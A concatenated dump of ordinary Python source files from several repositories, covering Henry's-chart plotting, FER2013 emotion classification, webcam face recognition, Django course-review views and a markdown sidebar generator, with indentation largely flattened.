Draw the Henry's chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
empirical_cumulative_distribution:
classical - f(i) = i/N
modified - f(i) = (i + a)/(N + 1 + 2a)
title:
The title of the chart.
legend:
Legend to display on the chart.
draw:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.).
"""
l = len(coefficents)
n = int(np.log2(l))
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
l = len(coefficents)
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=False)
coefficents = coefficents[index]
labels = labels[index]
# Empirical cumulative distribution f(i)
    dist = np.zeros(l)  # separate array so the sorted coefficients are not overwritten
if empirical_cumulative_distribution == "classical":
for i in range(l):
dist[i] = (i+1)/l
elif empirical_cumulative_distribution == "modified":
for i in range(l):
dist[i] = (i+1+a)/(l+1+2*a)
else:
print("Error: unknown empirical mode.")
# Corresponding quantile (normit) z(i)
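    # z(i) = sqrt(2) * erfinv(2*f(i) - 1) is the standard-normal quantile of the empirical CDF value f(i)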
normits = erfinv(2*dist - 1) * np.sqrt(2)
# mpl.figure()
mpl.ax.clear()
mpl.ax.plot(coefficents, normits, marker='1',
linestyle='--', linewidth=0.5, **kwargs)
mpl.ax.set_title(title)
mpl.ax.set_yticks(normits)
mpl.ax.set_yticklabels(labels)
mpl.ax.grid(which='major')
mpl.ax.legend([legend])
# fig.tight_layout()
if draw:
mpl.draw()
def plot_henry(coefficents, coefficents_labels=None, remove_a0: bool = True, empirical_cumulative_distribution: str = "classical", a: float = 0, title: str = "Henry bar chart", legend: str = "| Coefficients |", block: bool = False, show: bool = False, **kwargs):
"""
Plot the Henry's chart of the coefficients a_i.
coefficents:
A list or an array with the coefficients.
coefficents_labels:
A list or an array with the labels of the coefficient.
empirical_cumulative_distribution:
classical - f(i) = i/N
modified - f(i) = (i + a)/(N + 1 + 2a)
title:
The title of the chart.
legend:
Legend to display on the chart.
block:
        Defines whether the plot should block execution of the code or not.
    show:
        Defines whether the figure has to be displayed or not.
    **kwargs:
        Other optional arguments for the plot function (like the color, etc.).
"""
l = len(coefficents)
n = int(np.log2(l))
if coefficents_labels:
labels = np.array(coefficents_labels, dtype=str)
else:
labels = np.array(gen_a_labels(n), dtype=str)
if remove_a0:
coefficents = coefficents[1:]
labels = labels[1:]
l = len(coefficents)
# https://stackoverflow.com/a/7851166
index = sorted(range(len(coefficents)),
key=coefficents.__getitem__, reverse=False)
coefficents = coefficents[index]
labels = labels[index]
# Empirical cumulative distribution f(i)
    dist = np.zeros(l)  # separate array so the sorted coefficients are not overwritten
if empirical_cumulative_distribution == "classical":
for i in range(l):
dist[i] = (i+1)/l
elif empirical_cumulative_distribution == "modified":
for i in range(l):
dist[i] = (i+1+a)/(l+1+2*a)
else:
print("Error: unknown empirical mode.")
# Corresponding quantile (normit) z(i)
normits = erfinv(2*dist - 1) * np.sqrt(2)
fig, ax = plt.subplots()
ax.plot(coefficents, normits, marker='1',
linestyle='--', linewidth=0.5, **kwargs)
ax.set_title(title)
ax.set_yticks(normits)
ax.set_yticklabels(labels)
ax.grid(which='major')
ax.legend([legend])
fig.tight_layout()
if show:
plt.show(block=block)
return fig, ax
def clear_draw(mpl):
mpl.ax.clear()
mpl.draw()
def main():
# Test 1
y = np.array([77, 28.5, 141, 110, 161, 113, 220, 190])
print("y:", y)
a_hat = np.dot(gen_X_hat(int(np.log2(len(y)))), y)
print("a_hat:", a_hat)
y_hat = np.dot(gen_X(n=3), a_hat)
print("y_hat:", y_hat)
plot_coefficents(a_hat, block=False, color="orange")
plot_pareto(a_hat, block=True, color="orange")
plot_henry(a_hat, empirical_cumulative_distribution="modified",
block=True, color="blue")
print('Test 1:', y_hat == y, end="\n\n")
# Test 2
a_hat = np.array([10.25, 1.25, 0.75, 0.05])
print("a_hat:", a_hat)
y = np.array([8.3, 10.7, 9.7, 12.3])
print("y:", y)
a_hat_check = np.dot(gen_X_hat(n=2), y)
print("a_hat_check", a_hat_check)
plot_coefficents(a_hat, block=True, color="orange")
plot_henry(a_hat, empirical_cumulative_distribution="modified",
block=True, color="blue")
print('Test 2:', a_hat_check == a_hat, end="\n\n")
# Gen label
print(gen_a_labels(2)[3])
"""
n = 3
DoE = gen_design(n)
print(DoE)
DoE = gen_design(n, perm=None) # [0, 2, 1, 4, 3, 5, 6, 7])
print(DoE)
X = gen_X(n, show=False)
X_hat = gen_X_hat(n, show=True)
"""
if __name__ == "__main__":
main()
``` |
{
"source": "2010019970909/fer2013_using_Neural_Network",
"score": 4
} |
#### File: 2010019970909/fer2013_using_Neural_Network/load_and_process.py
```python
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
from sklearn import preprocessing
from sklearn.decomposition import PCA
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import Perceptron
from sklearn.metrics import confusion_matrix
from sklearn.neural_network import MLPClassifier
# Load the data and convert them to numpy files fdataX.npy and flabels.npy
def load_and_process(datafile='./fer2013.csv', images_key='pixels', labels_key='emotion', width=48, height=48):
print('Open the file')
data = pd.read_csv(datafile)
    print('File opened, proceeding to data extraction')
# getting the images from the dataset
datapoints = data[images_key].tolist()
usage = np.array(data['Usage'].tolist())
y = np.array(data['emotion'].tolist()) # Extract the target
# getting features for training
X = []
for xseq in datapoints:
X.append([int(pixel) for pixel in xseq.split(' ')])# [int(xp) for xp in xseq.split(' ')]).reshape(width, height).astype('float32'))
X = np.asarray(X)
# adapt the dimension of the data for the CNN
# X = np.expand_dims(np.asarray(X), -1)
# getting labels for training
# y = pd.get_dummies(data[labels_key]).as_matrix()
print("Extract the training, validation and testing set from the data")
# Extract the training, validation and testing set from the data
train_in = X[usage == 'Training']
train_out = y[usage == 'Training']
# print(len(train_in), len(train_out))
valid_in = X[usage == 'PrivateTest']
print(valid_in.shape)
valid_out = y[usage == 'PrivateTest']
print(valid_out.shape)
# print(len(valid_in), len(valid_out))
test_in = X[usage == 'PublicTest']
test_out = y[usage == 'PublicTest']
# print(len(test_in), len(test_out))
print('Shuffle the sets')
# Shuffling the training database in order to improve the efficiency
train_in, train_out = shuffle(train_in, train_out)
valid_in, valid_out = shuffle(valid_in, valid_out)
test_in, test_out = shuffle(test_in, test_out)
# m_classes = len(np.unique(train_out))
# print(m_classes)
print('Normalise the sets')
# Normalise the input variables
scaler_train = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_train_in = scaler_train.transform(train_in)
scaler_valid = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_valid_in = scaler_valid.transform(valid_in)
# print(scaled_valid_in.shape)
scaler_test = preprocessing.MinMaxScaler(feature_range=(-128,127)).fit(train_in)
scaled_test_in = scaler_test.transform(test_in)
# print(len(scaled_train_in), len(scaled_valid_in))
print('PCA analysis')
# PCA analysis
pca = PCA(n_components = 103)
model_pca = pca.fit(scaled_train_in) # Fit the PCA to the data
pca_train = model_pca.transform(scaled_train_in)
pca_valid = model_pca.transform(scaled_valid_in)
print('PCA VALID SHAPE' , pca_valid.shape)
pca_test = model_pca.transform(scaled_test_in)
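    # Sanity-check sketch (not in the original script, shown as an assumption):
    # the variance retained by the 103 components can be inspected with
    # print(np.cumsum(pca.explained_variance_ratio_)[-1])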
# Scale the data
scaler = StandardScaler() # doctest: +SKIP
# Don't cheat - fit only on training data
scaler.fit(pca_train) # doctest: +SKIP
scaled_pca_train = scaler.transform(pca_train) # doctest: +SKIP
# apply same transformation to test data
scaled_pca_valid = scaler.transform(pca_valid) # doctest: +SKIP
scaled_pca_test = scaler.transform(pca_test) # doctest: +SKIP
# CLASSES_NAME = ['Angry', 'Disgust', 'Fear', 'Happy', 'Sad', 'Surprise', 'Neutral']
# Single Perceptron
print('Train perceptron from PCA')
clf = Perceptron(fit_intercept=False,
max_iter=1000,
tol=1e-3,
shuffle=False).fit(scaled_pca_train, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_pca_train, train_out))
train_pred = clf.predict(scaled_pca_train)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_pca_valid, valid_out))
valid_pred = clf.predict(scaled_pca_valid)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_pca_test, test_out))
test_pred = clf.predict(scaled_pca_test)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
# MLP
print('Train MLP from PCA')
clf = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(100,), random_state=1).fit(scaled_pca_train, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_pca_train, train_out))
train_pred = clf.predict(scaled_pca_train)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_pca_valid, valid_out))
valid_pred = clf.predict(scaled_pca_valid)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_pca_test, test_out))
test_pred = clf.predict(scaled_pca_test)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
print('Train perceptron from normalised pixels')
clf = Perceptron(fit_intercept=False,
max_iter=1000,
tol=1e-3,
shuffle=False).fit(scaled_train_in, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_train_in, train_out))
train_pred = clf.predict(scaled_train_in)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_valid_in, valid_out))
valid_pred = clf.predict(scaled_valid_in)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_test_in, test_out))
test_pred = clf.predict(scaled_test_in)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
# MLP
print('Train MLP from normalised pixels')
clf = MLPClassifier(solver='adam', alpha=1e-5, hidden_layer_sizes=(100,), random_state=1).fit(scaled_train_in, train_out)
print('End training')
# print(clf.predict(scaled_pca_train))
print(clf.score(scaled_train_in, train_out))
train_pred = clf.predict(scaled_train_in)
conf_matrix_train = confusion_matrix(train_out, train_pred)
print(conf_matrix_train)
# print(clf.predict(scaled_pca_valid))
# print(scaled_pca_valid.shape, valid_out.shape)
print(clf.score(scaled_valid_in, valid_out))
valid_pred = clf.predict(scaled_valid_in)
conf_matrix_valid = confusion_matrix(valid_out, valid_pred)
print(conf_matrix_valid)
# print(clf.predict(scaled_pca_test))
print(clf.score(scaled_test_in, test_out))
test_pred = clf.predict(scaled_test_in)
conf_matrix_test = confusion_matrix(test_out, test_pred)
print(conf_matrix_test)
"""
Conclusion:
Perceptron, PCA (accuracy of around 20%) was less efficient than MLP, PCA
(accuracy of around 40%) but they both worked better than Perceptron, pixels
(accuracy of around 20%) and MLP, pixels (accuracy of around 10%).
Also, in the confusion matrix we can see that the emotion 1 (disgust)
is the most difficult to classify (in any case).
With 1000 hidden layers (against the 15 of before) and the adam solver
(against the 'lbfgs') the NNet gets overfitted but we slightly improve
the performances with the normalised pixels.
The perceptron works better with the pixels with an accuracy of around 30%
against 20% with the PCA. For the 1000 hidden layers MLP, PCA the accuracy is
around 63% for the training and around 40% for the test (validation and test set).
For the 1000 hidden layers MLP, pixels the accuracy is
around 61% for the training and around 35% for the test (validation and test set).
The state-of-the-art for the image classifier is an ImageNet network
(https://paperswithcode.com/sota/image-classification-on-imagenet) which can reach
above 70% accuracy values. Also the usage of CNN should improve the accuracy of
the neural network, as implemented in the following article:
https://medium.com/themlblog/how-to-do-facial-emotion-recognition-using-a-cnn-b7bbae79cd8f
"""
if __name__ == "__main__":
load_and_process()
print("Preprocessing Done")
``` |
{
"source": "201019-UiPath/Jewlz-TheBoyz-PlaylistAutomation-P2",
"score": 3
} |
#### File: Project2Final/FaceRecognition/data_preprocess.py
```python
import os
import shutil
import sys
import time
def startPreprocessing(cwd, relative_path):
input_datadir = relative_path + '/pre_img'
output_datadir = relative_path + '/train_img'
os.chdir(cwd + '/FaceRecognition/')
if not hasattr(sys, 'argv'):
sys.argv = ['']
sys.path.append('.')
fullpath = os.path.expanduser(relative_path + '/pre_img/')
if os.path.isdir(fullpath):
shutil.rmtree(fullpath)
time.sleep(.3) # making sure the folder is completely deleted before trying to create it again
os.mkdir(fullpath)
from preprocess import preprocesses
obj = preprocesses(input_datadir,output_datadir)
nrof_images_total, nrof_successfully_aligned = obj.collect_data()
return 'Total number of images: {}. Number of successfully aligned images: {}'.format(nrof_images_total, nrof_successfully_aligned)
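# Usage sketch (argument values are assumptions, not from the original project):
# startPreprocessing(os.getcwd(), './FaceRecognition')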
```
#### File: Project2Final/FaceRecognition/identify_face_image.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import cv2
import numpy as np
import os
import time
import pickle
import sys
def captureAndIdentify(cwd, relative_path):
modeldir = relative_path + '/model/20170511-185253.pb'
classifier_filename = relative_path + '/class/classifier.pkl'
npy= relative_path + '/npy'
train_img= relative_path + '/train_img'
WINDOW_TITLE = "Take photo using SPACE to continue with the process."
os.chdir(cwd + '/FaceRecognition/')
if not hasattr(sys, 'argv'):
sys.argv = ['']
sys.path.append('.')
import facenet
import detect_face
import tensorflow as tf
cam = cv2.VideoCapture(0)
cv2.namedWindow(WINDOW_TITLE)
img_name = ''
result_names = ''
while cv2.getWindowProperty(WINDOW_TITLE, 0) >= 0:
ret, frame = cam.read()
cv2.imshow(WINDOW_TITLE, frame)
if not ret:
break
k = cv2.waitKey(1)
if k%256 == 32:
# SPACE pressed
img_name = "capture.png"
cv2.imwrite(os.getcwd() + "/" + img_name, frame)
print("{} written!".format(img_name))
break
if k%256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
cam.release()
cv2.destroyAllWindows()
if img_name == '':
return 'Error: Did not capture anything. Press SPACE to capture a photo.'
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.6)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face.create_mtcnn(sess, os.path.expanduser(npy))
minsize = 20 # minimum size of face
            threshold = [0.6, 0.7, 0.7] # three steps' threshold
factor = 0.709 # scale factor
margin = 44
frame_interval = 3
batch_size = 1000
image_size = 182
input_image_size = 160
HumanNames = os.listdir(os.path.expanduser(train_img))
HumanNames.sort()
print('Loading feature extraction model')
facenet.load_model(modeldir)
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
embedding_size = embeddings.get_shape()[1]
classifier_filename_exp = os.path.expanduser(classifier_filename)
with open(classifier_filename_exp, 'rb') as infile:
(model, class_names) = pickle.load(infile, encoding='latin1')
# video_capture = cv2.VideoCapture("akshay_mov.mp4")
c = 0
print('Start Recognition!')
prevTime = 0
# ret, frame = video_capture.read()
frame = cv2.imread(img_name,0)
os.remove('capture.png') # clean up
# frame = cv2.resize(frame, (0,0), fx=0.5, fy=0.5) #resize frame (optional)
curTime = time.time()+1 # calc fps
timeF = frame_interval
if (c % timeF == 0):
find_results = []
if frame.ndim == 2:
frame = facenet.to_rgb(frame)
frame = frame[:, :, 0:3]
bounding_boxes, _ = detect_face.detect_face(frame, minsize, pnet, rnet, onet, threshold, factor)
nrof_faces = bounding_boxes.shape[0]
print('Faces Detected: %d' % nrof_faces)
if nrof_faces > 0:
det = bounding_boxes[:, 0:4]
img_size = np.asarray(frame.shape)[0:2]
cropped = []
scaled = []
scaled_reshape = []
bb = np.zeros((nrof_faces,4), dtype=np.int32)
for i in range(nrof_faces):
emb_array = np.zeros((1, embedding_size))
bb[i][0] = det[i][0]
bb[i][1] = det[i][1]
bb[i][2] = det[i][2]
bb[i][3] = det[i][3]
# inner exception
if bb[i][0] <= 0 or bb[i][1] <= 0 or bb[i][2] >= len(frame[0]) or bb[i][3] >= len(frame):
print('face is too close')
continue
cropped.append(frame[bb[i][1]:bb[i][3], bb[i][0]:bb[i][2], :])
cropped[i] = facenet.flip(cropped[i], False)
scaled.append(misc.imresize(cropped[i], (image_size, image_size), interp='bilinear'))
scaled[i] = cv2.resize(scaled[i], (input_image_size,input_image_size),
interpolation=cv2.INTER_CUBIC)
scaled[i] = facenet.prewhiten(scaled[i])
scaled_reshape.append(scaled[i].reshape(-1,input_image_size,input_image_size,3))
feed_dict = {images_placeholder: scaled_reshape[i], phase_train_placeholder: False}
emb_array[0, :] = sess.run(embeddings, feed_dict=feed_dict)
predictions = model.predict_proba(emb_array)
print(predictions)
best_class_indices = np.argmax(predictions, axis=1)
# print(best_class_indices)
best_class_probabilities = predictions[np.arange(len(best_class_indices)), best_class_indices]
                        print('Best class indices: ', best_class_indices)
                        print('Best class probabilities: ', best_class_probabilities)
if len([x for x in predictions[0].tolist() if x >= 0.8]) == 0:
print('No Valid Faces')
return 'Error: No valid faces detected. Will not continue with the process.'
else:
print('Here')
cv2.rectangle(frame, (bb[i][0], bb[i][1]), (bb[i][2], bb[i][3]), (0, 255, 0), 2) #boxing face
#plot result idx under box
text_x = bb[i][0]
text_y = bb[i][3] + 20
print('Result Indices: ', best_class_indices[0])
print('Human Names: ', HumanNames)
for H_i in HumanNames:
print('Human at index: ',H_i)
if HumanNames[best_class_indices[0]] == H_i:
result_names = HumanNames[best_class_indices[0]]
cv2.putText(frame, result_names, (text_x, text_y), cv2.FONT_HERSHEY_COMPLEX_SMALL,
1, (0, 0, 255), thickness=1, lineType=2)
else:
return 'Error: No faces detected. Will not continue with the process.'
        cv2.imshow('Valid faces detected. Close window to proceed.', frame)
        while cv2.getWindowProperty('Valid faces detected. Close window to proceed.', 0) >= 0:
k = cv2.waitKey(1)
if k%256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
cv2.destroyAllWindows()
return result_names
``` |
{
"source": "2010jing/uicCourse",
"score": 2
} |
#### File: course/templatetags/url_replace.py
```python
from urllib.parse import urlencode
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def url_replace(context, **kwargs):
query = context['request'].GET.dict()
query.update(kwargs)
return urlencode(query)
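# Template usage sketch (illustrative, not part of this file): after
# {% load url_replace %}, a link such as <a href="?{% url_replace page=2 %}">next</a>
# updates the "page" parameter while keeping the other GET parameters intact.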
```
#### File: uicCourse/dashboard/views.py
```python
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from .forms import SignUpForm, CreateTagForm, ProfileModifyForm, CreateNoticeForm
from course.models import ValidDivisionMajorPair, CourseType
from voting.models import Tags, QuickVotes, UserTaggingCourse
from .models import Notice
def welcome_page(request):
latest_notice = Notice.objects.filter(is_visible=True)[:3] # only take latest notice
return render(request, 'index/index.html', {'latest_notice': latest_notice})
def login_page(request):
if request.method == 'POST':
username = request.POST.get('username', '')
password = request.POST.get('password', '')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
messages.add_message(request, messages.SUCCESS, 'Login successfully.')
return redirect('/course/')
else:
messages.add_message(request, messages.ERROR, 'Wrong username or password.')
return redirect('/login/')
else:
if not request.user.is_authenticated:
            messages.add_message(request, messages.INFO, 'Login is required to continue.')
return render(request, 'auth/login.html')
else:
messages.add_message(request, messages.ERROR, 'No Double Login Is Allowed.')
return redirect('/')
def logout_receiver(request):
logout(request)
messages.add_message(request, messages.SUCCESS, 'Logout successfully.')
return redirect('/')
def signup_page(request):
if not request.user.is_authenticated:
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
messages.add_message(request, messages.SUCCESS, 'Sign up successfully.')
return redirect('/course/')
else:
form = SignUpForm()
return render(request, 'auth/signup.html', {'form': form})
else:
        messages.add_message(request, messages.ERROR, 'Not Allowed.')
return redirect('/')
@login_required
def profile_page(request):
return render(request, 'auth/profile.html')
@login_required
def profile_change(request):
if request.method == 'POST':
form = ProfileModifyForm(data=request.POST, instance=request.user)
if form.is_valid():
form.save()
messages.success(request, 'Your profile successfully updated!')
return redirect('/dashboard/profile/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = ProfileModifyForm(instance=request.user)
return render(request, 'auth/change_profile.html', {'form': form})
@login_required
def change_password_page(request):
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user) # Important!
messages.success(request, 'Your password was successfully updated!')
return redirect('/course/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = PasswordChangeForm(request.user)
return render(request, 'auth/change_password.html', {'form': form})
def terms_page(request):
return render(request, 'index/terms.html')
def privacy_page(request):
return render(request, 'index/privacy.html')
@login_required
def dashboard(request):
return render(request, 'dashboard/index.html')
@staff_member_required
def major_division(request):
pairs = ValidDivisionMajorPair.objects.all()
return render(request, 'dashboard/major_division.html', {'pairs': pairs})
@staff_member_required
def course_type(request):
pairs = CourseType.objects.all()
return render(request, 'dashboard/course_type.html', {'pairs': pairs})
@staff_member_required
def tags_page(request):
tags = Tags.objects.all()
return render(request, 'dashboard/tags.html', {'tags': tags})
@staff_member_required
def tags_create(request):
if request.method == 'POST':
form = CreateTagForm(request.POST)
if form.is_valid():
tag = form.save()
messages.success(request, 'The Tag: ' + tag.tag_title + ' was successfully created!')
return redirect('/dashboard/tags/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = CreateTagForm()
return render(request, 'dashboard/tag_create.html', {'form': form})
@staff_member_required
def tags_modify(request, tag_id):
if request.method == 'POST':
changing_tag = Tags.objects.get(pk=tag_id)
form = CreateTagForm(data=request.POST, instance=changing_tag)
if form.is_valid():
form.save()
messages.success(request, 'The tag has been successfully modified!')
return redirect('/dashboard/tags/')
else:
messages.error(request, 'Please correct the error below.')
else:
tag = Tags.objects.get(pk=tag_id)
form = CreateTagForm(instance=tag)
return render(request, 'dashboard/tag_create.html', {'form': form, 'is_modify': True, 'tag_id': tag.id})
@staff_member_required
def tags_delete(request, tag_id):
delete_tag = Tags.objects.get(pk=tag_id)
delete_tag.delete()
messages.success(request, 'The tag has been successfully deleted!')
return redirect('/dashboard/tags/')
@staff_member_required
def notice_page(request):
notices = Notice.objects.all()
return render(request, 'dashboard/notice.html', {'notices': notices})
@staff_member_required
def notice_create(request):
if request.method == 'POST':
form = CreateNoticeForm(request.POST)
if form.is_valid():
notice = form.save()
messages.success(request, 'The Notice: ' + notice.title + ' was successfully created!')
return redirect('/dashboard/notices/')
else:
messages.error(request, 'Please correct the error below.')
else:
form = CreateNoticeForm()
return render(request, 'dashboard/notice_create.html', {'form': form})
@staff_member_required
def notice_modify(request, notice_id):
if request.method == 'POST':
changing_notice = Notice.objects.get(pk=notice_id)
form = CreateNoticeForm(data=request.POST, instance=changing_notice)
if form.is_valid():
form.save()
messages.success(request, 'The notice has been successfully modified!')
return redirect('/dashboard/notices/')
else:
messages.error(request, 'Please correct the error below.')
else:
notice = Notice.objects.get(pk=notice_id)
form = CreateNoticeForm(instance=notice)
return render(request, 'dashboard/notice_create.html', {'form': form, 'is_modify': True, 'notice_id': notice.id})
@staff_member_required
def notice_delete(request, notice_id):
delete_notice = Notice.objects.get(pk=notice_id)
delete_notice.delete()
messages.success(request, 'The notice has been successfully deleted!')
return redirect('/dashboard/notices/')
@login_required
def quick_vote_record(request):
votes = QuickVotes.objects.filter(voter=request.user)
return render(request, 'dashboard/quickvote.html', {'votes': votes})
@login_required
def review_record(request):
reviews = UserTaggingCourse.objects.filter(tagger=request.user)
return render(request, 'dashboard/review.html', {'reviews': reviews})
``` |
{
"source": "2011301000133/2011301000133.github.io",
"score": 3
} |
#### File: 2011301000133.github.io/reading/auto_generat_sidebar.py
```python
import os
import re
import string
# Word count helpers
regex_chinese = re.compile('[\u4e00-\u9fa5]') # Chinese characters
regex_English = re.compile('[0-9a-zA-Z]+') # digits and English words
# Chinese and English punctuation
regex_punctuation = re.compile('[!"()*+,./:;<=>?{|}~。;,:“”()、?《》]')
def word_count(file_name_md):
f = open(file_name_md, 'r', encoding='utf-8')
passages = f.readlines()
# word_num = sum([len(passage.replace('\n', '').replace(' ', '')) for passage in passages])
word_num = sum([len(regex_chinese.findall(passage))
+ len(regex_English.findall(passage))
+ len(regex_punctuation.findall(passage))
for passage in passages])
f.close()
return word_num
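# Usage sketch (the path is an assumption): word_count('docs/some_note.md')
# returns the number of Chinese characters, English words/numbers and
# punctuation marks found in that markdown file.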
class TreeNode:
def __init__(self, name, type, layer, word_num=0):
self.name = name
self.type = type # 'file' or 'path'
self.layer = layer
self.word_num = word_num
self.children = dict()
def __repr__(self):
# return self.name+self.type+str(self.layer)+str([i for i in self.children])
return 'name={name},type={type},layer={layer},word_num={word_num},children={children}'. \
format(name=self.name, type=self.type, layer=self.layer, word_num=self.word_num,
children=[i for i in self.children])
class Tree:
def __init__(self, path):
path_walker = os.walk(path, topdown=True)
self.path1, self.path2 = '\\'.join(path.split('\\')[:-1]), path.split('\\')[-1]
        # e.g. 'C:\\Users\\guofei8\\Desktop\\git\\GitHub\\reading' and 'docs'
self.root = TreeNode(self.path2, 'path', 0)
self.add_all_tree_node(path_walker)
def addTreeNode(self, path, dirs, nondirs):
pointer = self.root
for i in path:
if i not in pointer.children:
pointer.children[i] = TreeNode(i, 'path', pointer.layer + 1)
pointer = pointer.children[i]
for i in dirs:
pointer.children[i] = TreeNode(name='* ' + i, type='path', layer=pointer.layer + 1)
for i in nondirs:
            # each node's name is already a formatted markdown line, so the pre-order traversal needs little extra processing
word_num = word_count('\\'.join([self.path1] + path + [i]))
file_name_md = '* [' + i.replace('.md', '') + \
('<sup style = "color:red">' + str(word_num) + '字<sup>' if word_num else '') \
+ ']' \
+ '(' + '/'.join(path) + '/' + i + ')'
pointer.children[i] = TreeNode(name=file_name_md,
type='file',
layer=pointer.layer + 1,
word_num=word_num)
def add_all_tree_node(self, path_walker):
for top, dirs, nondirs in path_walker:
            path = top.replace(self.path1, '').split('\\')[1:]  # index 0 is an empty string
self.addTreeNode(path, dirs, nondirs)
def pre_order(self, root):
return '' if (root is None) \
else ((root.layer - 2) * ' ' if root.layer > 1 else '# ') + root.name + '\n' + \
''.join([self.pre_order(i) for i in root.children.values()])
def pre_order2(self, root):
'''
        Total word count
'''
return 0 if (root is None) else root.word_num + sum([self.pre_order2(i) for i in root.children.values()])
path = os.getcwd() + r'\docs'
tree = Tree(path)
sidebar = tree.pre_order(tree.root.children[tree.path2])
print(sidebar)
# Total word count
c = tree.pre_order2(tree.root.children[tree.path2])
print('Total word count:', c)
# %%
head = '''
<a href="http://www.guofei.site" target='blog'>
<img src="http://www.guofei.site/public/img/me.png" alt="回到blog" height="64" width="64">
</a>
'''
tail = '''
* 书单
* [书单](书单/书单.md)
* [读完的书单](书单/读完的书单.md)
* 建站日志
* [快速开始](建站日志/quickstart.md)
* [配置项](建站日志/configuration.md)
* [主题](建站日志/themes.md)
* [扩展Markdown语法<sup style="color:red">(new)<sup>](建站日志/markdown.md)
* [mermaid语法](建站日志/mermaid.md)
'''
content = '\n'.join(sidebar.split('\n')[1:])
f = open('sidebar.md', 'w', encoding='utf-8')
# print(head+content)
# f.write(head+content.encode('utf-8').decode('utf-8'))
f.write(head + content + tail)
f.close()
f = open('homepage.md', 'w', encoding='utf-8')
# print(head+content)
# f.write(head+content.encode('utf-8').decode('utf-8'))
f.write(content)
f.close()
# %%
# 统计每个板块的字数
def word_ana():
import re
regex = re.compile("[0-9]+['字']")
total_analys = []
for i in sidebar.split('\n')[1:]:
if len(i) > 0:
if i[0] == '*':
chapter = i[2:]
else:
k = regex.findall(i)
word_num = int(k[0].replace('字', '')) if len(k) > 0 else 0
total_analys.append([chapter, word_num])
import pandas as pd
total_analys_pd = pd.DataFrame(total_analys, columns=['chapter', 'word_num'])
a = total_analys_pd.groupby('chapter').sum()
import plotly.graph_objs as go
import plotly
    # Reshape into the data format needed for plotting
data1 = go.Bar(
x=a.index,
y=a.word_num,
name='v1'
)
layout = go.Layout(title="bar charts", xaxis={'title': 'x'}, yaxis={'title': 'value'})
fig = go.Figure(data=[data1], layout=layout)
plotly.offline.plot(fig, filename='c:\\abc\\example.html')
# word_ana()
``` |
{
"source": "2011-sagittarius/FakeNews",
"score": 3
} |
#### File: FakeNews/python/KeywordExtraction.py
```python
import sys
dataset = sys.argv[1]
# dataset = "https://apnews.com/article/pandemics-dallas-storms-coronavirus-pandemic-texas-7a04c04d40943e53ee17f7f946d3a7fa"
############################
###### OLD PROCESSING ######
############################
import pandas
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
##Creating a list of stop words and adding custom stopwords
stop_words = set(stopwords.words("english"))
##Creating a list of custom stopwords
